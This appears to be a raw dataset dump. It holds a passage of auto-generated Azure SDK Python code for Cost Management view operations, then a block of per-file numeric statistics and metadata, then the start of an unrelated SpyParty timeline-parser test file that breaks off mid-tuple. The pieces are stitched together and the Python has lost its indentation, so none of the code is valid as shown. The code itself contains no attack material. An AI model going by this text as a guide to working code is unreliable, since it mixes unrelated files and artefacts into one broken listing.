request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ViewListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_scope.metadata = {'url': '/{scope}/providers/Microsoft.CostManagement/views'}
def get(
self,
view_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.View"
"""Gets the view by view name.
:param view_name: View name.
:type view_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: View or the result of cls(response)
:rtype: ~azure.mgmt.costmanagement.models.View
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.View"]
error_map = kwargs.pop('error_map', {404: ResourceNotFoundError, 409: ResourceExistsError})
api_version = "2019-11-01"
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'viewName': self._serialize.url("view_name", view_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('View', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/providers/Microsoft.CostManagement/views/{viewName}'}
def create_or_update(
self,
view_name, # type: str
e_tag=None, # type: Optional[str]
display_name=None, # type: Optional[str]
scope=None, # type: Optional[str]
chart=None, # type: Optional[Union[str, "models.ChartType"]]
accumulated=None, # type: Optional[Union[str, "models.AccumulatedType"]]
metric=None, # type: Optional[Union[str, "models.MetricType"]]
kpis=None, # type: Optional[List["KpiProperties"]]
pivots=None, # type: Optional[List["PivotProperties"]]
timeframe=None, # type: Optional[Union[str, "models.ReportTimeframeType"]]
time_period=None, # type: Optional["models.ReportConfigTimePeriod"]
dataset=None, # type: Optional["models.ReportConfigDataset"]
**kwargs # type: Any
):
# type: (...) -> "models.View"
"""The operation to create or update a view. Update operation requires latest eTag to be set in the request. You may obtain the latest eTag by performing a get operation. Create operation does not require eTag.
:param view_name: View name.
:type view_name: str
:param e_tag: eTag of the resource. To handle concurrent update scenario, this field will be
used to determine whether the user is updating the latest version or not.
:type e_tag: str
:param display_name: User input name of the view. Required.
:type display_name: str
:param scope: Cost Management scope to save the view on. This includes
'subscriptions/{subscriptionId}' for subscription scope,
'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}' for resourceGroup scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}' for Billing Account scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/departments/{departmentId}' for
Department scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/enrollmentAccounts/{enrollmentAccountId}'
for EnrollmentAccount scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/billingProfiles/{billingProfileId}'
for BillingProfile scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/invoiceSections/{invoiceSectionId}'
for InvoiceSection scope, 'providers/Microsoft.Management/managementGroups/{managementGroupId}'
for Management Group scope,
'/providers/Microsoft.CostManagement/externalBillingAccounts/{externalBillingAccountName}' for
ExternalBillingAccount scope, and
'/providers/Microsoft.CostManagement/externalSubscriptions/{externalSubscriptionName}' for
ExternalSubscription scope.
:type scope: str
:param chart: Chart type of the main view in Cost Analysis. Required.
:type chart: str or ~azure.mgmt.costmanagement.models.ChartType
:param accumulated: Show costs accumulated over time.
:type accumulated: str or ~azure.mgmt.costmanagement.models.AccumulatedType
:param metric: Metric to use when displaying costs.
:type metric: str or ~azure.mgmt.costmanagement.models.MetricType
:param kpis: List of KPIs to show in Cost Analysis UI.
:type kpis: list[~azure.mgmt.costmanagement.models.KpiProperties]
:param pivots: Configuration of 3 sub-views in the Cost Analysis UI.
:type pivots: list[~azure.mgmt.costmanagement.models.PivotProperties]
:param timeframe: The time frame for pulling data for the report. If custom, then a specific
time period must be provided.
:type timeframe: str or ~azure.mgmt.costmanagement.models.ReportTimeframeType
:param time_period: Has time period for pulling data for the report.
:type time_period: ~azure.mgmt.costmanagement.models.ReportConfigTimePeriod
:param dataset: Has definition for data in this report config.
:type dataset: ~azure.mgmt.costmanagement.models.ReportConfigDataset
:keyword callable cls: A custom type or function that will be passed the direct response
:return: View or the result of cls(response)
        :rtype: ~azure.mgmt.costmanagement.models.View
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.View"]
error_map = kwargs.pop('error_map', {404: ResourceNotFoundError, 409: ResourceExistsError})
_parameters = models.View(e_tag=e_tag, display_name=display_name, scope=scope, chart=chart, accumulated=accumulated, metric=metric, kpis=kpis, pivots=pivots, timeframe=timeframe, time_period=time_period, dataset=dataset)
api_version = "2019-11-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self.create_or_update.metadata['url']
path_format_arguments = {
'viewName': self._serialize.url("view_name", view_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = 'application/json'
# Construct and send request
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(_parameters, 'View')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('View', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('View', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/providers/Microsoft.CostManagement/views/{viewName}'}
def delete(
self,
view_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""The operation to delete a view.
:param view_name: View name.
:type view_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = kwargs.pop('error_map', {404: ResourceNotFoundError, 409: ResourceExistsError})
api_version = "2019-11-01"
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'viewName': self._serialize.url("view_name", view_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/providers/Microsoft.CostManagement/views/{viewName}'}
def get_by_scope(
self,
scope, # type: str
view_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.View"
"""Gets the view for the defined scope by view name.
:param scope: The scope associated with view operations. This includes
'subscriptions/{subscriptionId}' for subscription scope,
'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}' for resourceGroup scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}' for Billing Account scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/departments/{departmentId}' for
Department scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/enrollmentAccounts/{enrollmentAccountId}'
for EnrollmentAccount scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/billingProfiles/{billingProfileId}'
for BillingProfile scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/invoiceSections/{invoiceSectionId}'
for InvoiceSection scope, 'providers/Microsoft.Management/managementGroups/{managementGroupId}'
for Management Group scope,
'providers/Microsoft.CostManagement/externalBillingAccounts/{externalBillingAccountName}' for
External Billing Account scope and
'providers/Microsoft.CostManagement/externalSubscriptions/{externalSubscriptionName}' for
External Subscription scope.
:type scope: str
:param view_name: View name.
:type view_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: View or the result of cls(response)
:rtype: ~azure.mgmt.costmanagement.models.View
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.View"]
error_map = kwargs.pop('error_map', {404: ResourceNotFoundError, 409: ResourceExistsError})
api_version = "2019-11-01"
# Construct URL
url = self.get_by_scope.metadata['url']
path_format_arguments = {
'scope': self._serialize.url("scope", scope, 'str'),
'viewName': self._serialize.url("view_name", view_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('View', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_by_scope.metadata = {'url': '/{scope}/providers/Microsoft.CostManagement/views/{viewName}'}
def create_or_update_by_scope(
self,
scope, # type: str
view_name, # type: str
e_tag=None, # type: Optional[str]
display_name=None, # type: Optional[str]
view_properties_scope=None, # type: Optional[str]
chart=None, # type: Optional[Union[str, "models.ChartType"]]
accumulated=None, # type: Optional[Union[str, "models.AccumulatedType"]]
metric=None, # type: Optional[Union[str, "models.MetricType"]]
kpis=None, # type: Optional[List["KpiProperties"]]
pivots=None, # type: Optional[List["PivotProperties"]]
timeframe=None, # type: Optional[Union[str, "models.ReportTimeframeType"]]
time_period=None, # type: Optional["models.ReportConfigTimePeriod"]
dataset=None, # type: Optional["models.ReportConfigDataset"]
**kwargs # type: Any
):
# type: (...) -> "models.View"
"""The operation to create or update a view. Update operation requires latest eTag to be set in the request. You may obtain the latest eTag by performing a get operation. Create operation does not require eTag.
:param scope: The scope associated with view operations. This includes
'subscriptions/{subscriptionId}' for subscription scope,
'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}' for resourceGroup scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}' for Billing Account scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/departments/{departmentId}' for
Department scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/enrollmentAccounts/{enrollmentAccountId}'
for EnrollmentAccount scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/billingProfiles/{billingProfileId}'
for BillingProfile scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/invoiceSections/{invoiceSectionId}'
for InvoiceSection scope, 'providers/Microsoft.Management/managementGroups/{managementGroupId}'
for Management Group scope,
'providers/Microsoft.CostManagement/externalBillingAccounts/{externalBillingAccountName}' for
External Billing Account scope and
'providers/Microsoft.CostManagement/externalSubscriptions/{externalSubscriptionName}' for
External Subscription scope.
:type scope: str
:param view_name: View name.
:type view_name: str
:param e_tag: eTag of the resource. To handle concurrent update scenario, this field will be
used to determine whether the user is updating the latest version or not.
:type e_tag: str
:param display_name: User input name of the view. Required.
:type display_name: str
:param view_properties_scope: Cost Management scope to save the view on. This includes
'subscriptions/{subscriptionId}' for subscription scope,
'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}' for resourceGroup scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}' for Billing Account scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/departments/{departmentId}' for
Department scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/enrollmentAccounts/{enrollmentAccountId}'
for EnrollmentAccount scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/billingProfiles/{billingProfileId}'
for BillingProfile scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/invoiceSections/{invoiceSectionId}'
for InvoiceSection scope, 'providers/Microsoft.Management/managementGroups/{managementGroupId}'
for Management Group scope,
'/providers/Microsoft.CostManagement/externalBillingAccounts/{externalBillingAccountName}' for
ExternalBillingAccount scope, and
'/providers/Microsoft.CostManagement/externalSubscriptions/{externalSubscriptionName}' for
ExternalSubscription scope.
:type view_properties_scope: str
:param chart: Chart type of the main view in Cost Analysis. Required.
:type chart: str or ~azure.mgmt.costmanagement.models.ChartType
:param accumulated: Show costs accumulated over time.
:type accumulated: str or ~azure.mgmt.costmanagement.models.AccumulatedType
:param metric: Metric to use when displaying costs.
:type metric: str or ~azure.mgmt.costmanagement.models.MetricType
:param kpis: List of KPIs to show in Cost Analysis UI.
:type kpis: list[~azure.mgmt.costmanagement.models.KpiProperties]
:param pivots: Configuration of 3 sub-views in the Cost Analysis UI.
:type pivots: list[~azure.mgmt.costmanagement.models.PivotProperties]
:param timeframe: The time frame for pulling data for the report. If custom, then a specific
time period must be provided.
:type timeframe: str or ~azure.mgmt.costmanagement.models.ReportTimeframeType
:param time_period: Has time period for pulling data for the report.
:type time_period: ~azure.mgmt.costmanagement.models.ReportConfigTimePeriod
:param dataset: Has definition for data in this report config.
:type dataset: ~azure.mgmt.costmanagement.models.ReportConfigDataset
:keyword callable cls: A custom type or function that will be passed the direct response
:return: View or the result of cls(response)
        :rtype: ~azure.mgmt.costmanagement.models.View
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.View"]
error_map = kwargs.pop('error_map', {404: ResourceNotFoundError, 409: ResourceExistsError})
_parameters = models.View(e_tag=e_tag, display_name=display_name, scope=view_properties_scope, chart=chart, accumulated=accumulated, metric=metric, kpis=kpis, pivots=pivots, timeframe=timeframe, time_period=time_period, dataset=dataset)
api_version = "2019-11-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self.create_or_update_by_scope.metadata['url']
path_format_arguments = {
'scope': self._serialize.url("scope", scope, 'str'),
'viewName': self._serialize.url("view_name", view_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = 'application/json'
# Construct and send request
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(_parameters, 'View')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('View', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('View', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update_by_scope.metadata = {'url': '/{scope}/providers/Microsoft.CostManagement/views/{viewName}'}
def delete_by_scope(
self,
scope, # type: str
view_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""The operation to delete a view.
:param scope: The scope associated with view operations. This includes
'subscriptions/{subscriptionId}' for subscription scope,
'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}' for resourceGroup scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}' for Billing Account scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/departments/{departmentId}' for
Department scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/enrollmentAccounts/{enrollmentAccountId}'
for EnrollmentAccount scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/billingProfiles/{billingProfileId}'
for BillingProfile scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/invoiceSections/{invoiceSectionId}'
for InvoiceSection scope, 'providers/Microsoft.Management/managementGroups/{managementGroupId}'
for Management Group scope,
'providers/Microsoft.CostManagement/externalBillingAccounts/{externalBillingAccountName}' for
External Billing Account scope and
'providers/Microsoft.CostManagement/externalSubscriptions/{externalSubscriptionName}' for
External Subscription scope.
:type scope: str
:param view_name: View name.
:type view_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = kwargs.pop('error_map', {404: ResourceNotFoundError, 409: ResourceExistsError})
api_version = "2019-11-01"
# Construct URL
url = self.delete_by_scope.metadata['url']
path_format_arguments = {
'scope': self._serialize.url("scope", scope, 'str'),
'viewName': self._serialize.url("view_name", view_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_by_scope.metadata = {'url': '/{scope}/providers/Microsoft.CostManagement/views/{viewName}'}
| 50.609971
| 244
| 0.68067
| 3,632
| 34,516
| 6.33728
| 0.082048
| 0.043794
| 0.045966
| 0.039102
| 0.934744
| 0.934309
| 0.931529
| 0.930703
| 0.925099
| 0.914498
| 0
| 0.006052
| 0.219724
| 34,516
| 681
| 245
| 50.684288
| 0.848582
| 0.473635
| 0
| 0.821656
| 0
| 0
| 0.081636
| 0.025972
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047771
| false
| 0
| 0.028662
| 0
| 0.140127
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| bf30dd287dac5c72b954c133feb32342f600ed86
| 254,716
| py
| Python
| triple_agent/tests/test_parse_timeline.py
| andrewzwicky/TripleAgent
| 8d056df5c53a3d264dc778bad6771a0a2f62e7e7
| ["MIT"] | 3
| 2020-04-25T11:42:03.000Z
| 2020-07-08T16:38:26.000Z
| triple_agent/tests/test_parse_timeline.py
| andrewzwicky/TripleAgent
| 8d056df5c53a3d264dc778bad6771a0a2f62e7e7
| ["MIT"] | 17
| 2019-08-11T19:09:55.000Z
| 2021-03-30T17:12:28.000Z
| triple_agent/tests/test_parse_timeline.py
| andrewzwicky/TripleAgent
| 8d056df5c53a3d264dc778bad6771a0a2f62e7e7
| ["MIT"] | null | null | null |
from pathlib import Path
from typing import List, Tuple, Optional
import cv2
import pytest
from triple_agent.parsing.timeline.parse_timeline import (
parse_screenshot,
find_overlap_last_page_index,
trim_overlapped_list,
)
from triple_agent.classes.action_tests import ActionTest
from triple_agent.classes.books import Books
from triple_agent.classes.characters import Characters
from triple_agent.classes.missions import Missions
from triple_agent.classes.roles import Roles
from triple_agent.classes.timeline import TimelineCategory
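# Each test case maps a screenshot ID to the timeline events expected from parsing
# that screenshot.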
SCREENSHOT_TEST_CASES = [
(
"671152956268014896",
[
(
"spy",
"00:37.5",
"waiter stopped offering drink.",
(Characters.Taft,),
(00 * 60 + 37.5),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:35.5",
"spy leaves conversation.",
(None,),
(00 * 60 + 35.5),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:31.3",
"spy enters conversation.",
(None,),
(00 * 60 + 31.3),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:31.3",
"spy joined conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 31.3),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:25.1",
"guest list purloined.",
(Characters.Duke,),
(00 * 60 + 25.1),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.MissionComplete,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"00:24.1",
"action triggered: contact double agent",
(None,),
(00 * 60 + 24.1),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"00:24.1",
"real banana bread started.",
(None,),
(00 * 60 + 24.1),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"00:23.4",
"action test red: contact double agent",
(None,),
(00 * 60 + 23.4),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Contact,
ActionTest.Red,
),
(
"spy",
"00:19.1",
"banana bread uttered.",
(None,),
(00 * 60 + 19.1),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"00:18.1",
"double agent contacted.",
(Characters.Salmon,),
(00 * 60 + 18.1),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.MissionComplete,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"00:08.9",
"45 seconds added to match.",
(None,),
(00 * 60 + 08.9),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:50.7",
"spy leaves conversation.",
(None,),
(00 * 60 + 50.7),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:50.7",
"spy left conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 50.7),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:50.5",
"spy enters conversation.",
(None,),
(00 * 60 + 50.5),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:50.5",
"spy joined conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 50.5),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:49.2",
"spy picks up briefcase.",
(None,),
(00 * 60 + 49.2),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:49.2",
"picked up fingerprintable briefcase.",
(None,),
(00 * 60 + 49.2),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"00:47.6",
"spy leaves conversation.",
(None,),
(00 * 60 + 47.6),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:47.6",
"spy left conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 47.6),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:47.3",
"spy enters conversation.",
(None,),
(00 * 60 + 47.3),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:47.3",
"spy joined conversation with double agent.",
(Characters.Salmon,),
(00 * 60 + 47.3),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:45.2",
"action triggered: fingerprint ambassador",
(None,),
(00 * 60 + 45.2),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"00:45.2",
"started fingerprinting briefcase.",
(None,),
(00 * 60 + 45.2),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"00:44.3",
"fingerprinted briefcase.",
(None,),
(00 * 60 + 44.3),
None,
(None,),
(None,),
TimelineCategory.MissionPartial | TimelineCategory.Briefcase,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"00:42.8",
"spy returns briefcase.",
(None,),
(00 * 60 + 42.8),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:41.1",
"45 seconds added to match.",
(None,),
(00 * 60 + 41.1),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:25.9",
"45 seconds added to match.",
(None,),
(1 * 60 + 25.9),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:10.8",
"45 seconds added to match.",
(None,),
(2 * 60 + 10.8),
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:53.7",
"spy leaves conversation.",
(None,),
(2 * 60 + 53.7),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:53.7",
"spy left conversation with double agent.",
(Characters.Salmon,),
(2 * 60 + 53.7),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
(
"1572372555002699956",
[
(
"game",
"03:15.0",
"game started.",
(None,),
(3 * 60 + 15.0),
None,
(None,),
(None,),
TimelineCategory.GameStart,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"03:14.2",
"marked less suspicious.",
(Characters.Duke,),
(3 * 60 + 14.2),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:13.5",
"spy player takes control from ai.",
(None,),
(3 * 60 + 13.5),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:12.8",
"action triggered: bug ambassador",
(None,),
(3 * 60 + 12.8),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"03:12.8",
"begin planting bug while walking.",
(Characters.Taft,),
(3 * 60 + 12.8),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.NoCategory,
Missions.Bug,
ActionTest.NoAT,
),
(
"sniper",
"03:12.0",
"marked less suspicious.",
(Characters.Carlos,),
(3 * 60 + 12.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:11.8",
"failed planting bug while walking.",
(Characters.Taft,),
(3 * 60 + 11.8),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.NoCategory,
Missions.Bug,
ActionTest.NoAT,
),
(
"sniper",
"03:09.6",
"marked suspicious.",
(Characters.Sikh,),
(3 * 60 + 09.6),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:07.1",
"spy enters conversation.",
(None,),
(3 * 60 + 07.1),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:07.1",
"spy joined conversation with double agent.",
(Characters.Carlos,),
(3 * 60 + 07.1),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:02.0",
"action triggered: contact double agent",
(None,),
(3 * 60 + 02.0),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"03:02.0",
"real banana bread started.",
(None,),
(3 * 60 + 02.0),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"03:01.3",
"action test green: contact double agent",
(None,),
(3 * 60 + 01.3),
None,
